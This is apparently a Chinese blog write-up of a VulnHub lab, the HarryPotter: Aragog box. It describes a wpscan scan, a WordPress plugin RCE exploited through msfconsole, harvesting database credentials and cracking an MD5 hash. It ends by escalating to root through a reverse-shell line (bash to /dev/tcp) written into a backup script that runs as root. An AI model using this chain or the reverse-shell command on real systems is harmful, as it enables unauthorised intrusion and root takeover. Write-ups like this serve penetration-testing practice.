1、靶机地址:
HarryPotter: Aragog (1.0.2) ~ VulnHub
死亡圣器三部曲之第一部,Aragog是海格养的蜘蛛的名字, 并且又牵扯到了密室
2、渗透过程
确定靶机ip,攻击机ip,扫描靶机开放端口
只有22,80端口,对80端口进行目录爆破,发现是wordpress框架
这里给了提示,说明是wordpress plugins存在一些可利用的点
查看源代码,发现域名,打开hosts,将靶机ip与域名进行绑定
下一步就是利用wpscan去扫描查看,这里需要加入api-token才能扫出更多的东西,可以自己去官网注册一个,然后将自己的api-token复制下来就ok
wpscan --url http://192.168.56.143/blog --api-token=xxxxx -e p --plugins-detection aggressive
自己去免费注册一个就行WPScan: WordPress Security Scanner
使用命令进行扫描
发现存在的还听很多,这里有个RCE,就用它,可以去查看该漏洞怎么用,反弹shell到kali本地,也可以用msfconsole进行攻击,搜索相关的模块
选择1,然后进行参数的设定
完全设置好后,进行run
攻击成功,建立了连接
查看uid,然后进入shell,将其变为交互式shell
进行一番查看,发现了一个用户,hagrid98,里面存在第一个魂器,查看发现是base64编码
那就解码一下
RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets
这是伏地魔的那个日记
下一步就是进行提权,wordpress在安装的时候会存在默认配置文件,进行一下搜索,发现了wordpress文件,进入后看到了默认配置文件,配置文件中有账户密码
发现了数据库的用户和密码,进入数据库拿一下有用的信息
发现用户名和密码,密码md5加密,破解下
利用ssh远程一下这个用户,连接成功,以该用户进行提取操作,发现没什么东西可以用
这边利用个提取辅助脚本,进行探测,在本地开启web服务,利用远程ssh,下载提权辅助脚本
对其进行赋权
执行后,没什么太大的发现。换一个提权辅助脚本
执行
执行发现了一个备份的脚本,它是在一段时间进行备份操作,执行的用户属性是root,那就直接讲下面反弹shell的代码写入这个备份文件
echo 'bash -i >& /dev/tcp/192.168.56.136/7899 0>&1'>/opt/.backup.sh
然后执行上面的备份脚本的操作,在kali本地监听,反弹成功,提权至root,发现了第二个魂器
第一部中存在了两个魂器,自此渗透结束
3、总结
对于该靶机的渗透进行总结,总体的思路还是收集信息,对可以利用的框架进行漏洞扫描,中间有一些小细节,灵活多变,总体思路不变,最后是在正常的提权步骤下,没有想法了,利用到提权辅助脚本,发现了存在的备份文件。最好还是自己进行提权信息的收集和探测,最后没有办法了,再利用脚本进行辅助。
后续带来哈利波特死亡圣器的第二部和第三部靶机!
331
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
